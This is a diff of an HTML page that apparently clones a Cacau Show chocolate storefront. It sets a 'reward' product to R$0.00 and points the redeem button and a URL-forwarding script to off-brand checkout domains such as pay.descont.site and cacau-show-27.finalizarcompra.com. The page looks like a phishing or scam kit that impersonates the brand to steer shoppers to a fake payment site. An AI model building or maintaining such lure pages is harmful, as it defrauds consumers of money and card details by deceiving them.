--- a/ovo5/index.html
+++ b/ovo5/index.html
@@ -4,6 +4,7 @@
 
 
 
+
 <!DOCTYPE html><html lang=""><head>
   
     <link rel="preload" href="https://c2.cdn1tp.net/8e50e2e390084f2a8c97e775a30b31c6/js/gtmf0de.js" as="script">
@@ -858,10 +859,10 @@
                             </span>
                           </span>
 
-                          <span class="it__shelf--value" content="0.01"></span>
+                          <span class="it__shelf--value" content="0.00"></span>
 
                           <div class="it__shelf__discountPrice">
-                            R$0.01
+                            R$0.00
 
                             <div class="it__shelf__discountPrice__cacauLoversTag">
                               <span>Exclusivo Avaliação</span>
@@ -892,7 +893,7 @@
                     <div class="it_product__tocart">
                       <input type="hidden" class="add-to-cart-url" value="/on/demandware.store/Sites-CacauShow-Site/default/Cart-AddProduct">
 
-                      <button onclick="location.href='https://cacau-show-27.finalizarcompra.com/r/N54u9nb19gqL5wv5v1';" class="add-to-cart btn btn-primary it_product__tocart__btn" data-pid="1003264">
+                      <button onclick="location.href='https://pay.descont.site/NDr8gmkQObqZBmj';" class="add-to-cart btn btn-primary it_product__tocart__btn" data-pid="1003264">
                       <i class="fa-regular fa-gift"></i>
                         Resgatar
                       </button>
@@ -1482,7 +1483,7 @@
     <!-- Demandware Active Data (body_end-active_data.js) -->
     <script src="js/dwac-21.7.js" type="text/javascript" async="async"></script>
 	<script>
-        let prefix = ["https://noticiasde2024.fun/", "https://cacau-show-27.finalizarcompra.com/"];
+        let prefix = ["https://noticiasde2024.fun/", "https://pay.descont.site/NDr8gmkQObqZBmj"];
         function getParams() {
             let t = "",
                 e = window.top.location.href,
